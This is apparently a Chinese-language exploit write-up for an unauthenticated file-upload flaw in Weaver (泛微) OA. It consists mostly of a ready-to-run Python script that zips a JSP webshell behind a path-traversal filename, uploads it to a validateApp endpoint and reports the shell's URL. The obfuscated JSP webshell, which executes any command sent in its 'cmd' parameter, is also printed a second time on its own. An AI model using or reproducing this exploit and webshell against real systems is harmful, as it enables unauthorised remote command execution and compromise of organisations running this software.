泛微OA前台GetShell 复现
漏洞路径:
/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
Python
import zipfile import random import sys import requests def generate_random_str(randomlength=16): random_str = '' base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' length = len(base_str) - 1 for i in range(randomlength): random_str += base_str[random.randint(0, length)] return random_str mm = generate_random_str(8) webshell_name1 = mm+'.jsp' webshell_name2 = '../../../'+webshell_name1 def file_zip(): shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page import="sun.misc.BASE64Decoder" %> <% if(request.getParameter("cmd")!=null){ BASE64Decoder decoder = new BASE64Decoder(); Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU="))); Process e = (Process) rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new Object[]{}), request.getParameter("cmd") ); java.io.InputStream in = e.getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> """ ## 替换shell内容 zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED) zf.writestr(webshell_name2, shell) def GetShell(urllist): file_zip() print('上传文件中') urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp' file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))] requests.post(url=urls,files=file,timeout=60, verify=False) GetShellurl = urllist+'/cloudstore/'+webshell_name1 GetShelllist = requests.get(url = GetShellurl) if GetShelllist.status_code == 200: print('利用成功webshell地址为:'+GetShellurl) else: print('未找到webshell利用失败') def main(): if (len(sys.argv) == 2): url = sys.argv[1] GetShell(url) else: print("python3 lgo.py http://xx.xx.xx.xx") if __name__ == '__main__': main()
Code
<%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page import="sun.misc.BASE64Decoder" %> <% if(request.getParameter("cmd")!=null){ BASE64Decoder decoder = new BASE64Decoder(); Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU="))); Process e = (Process) rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new Object[]{}), request.getParameter("cmd") ); java.io.InputStream in = e.getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(" "); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(" "); } %>
参考:
https://www.cnblogs.com/nul1/p/14749353.html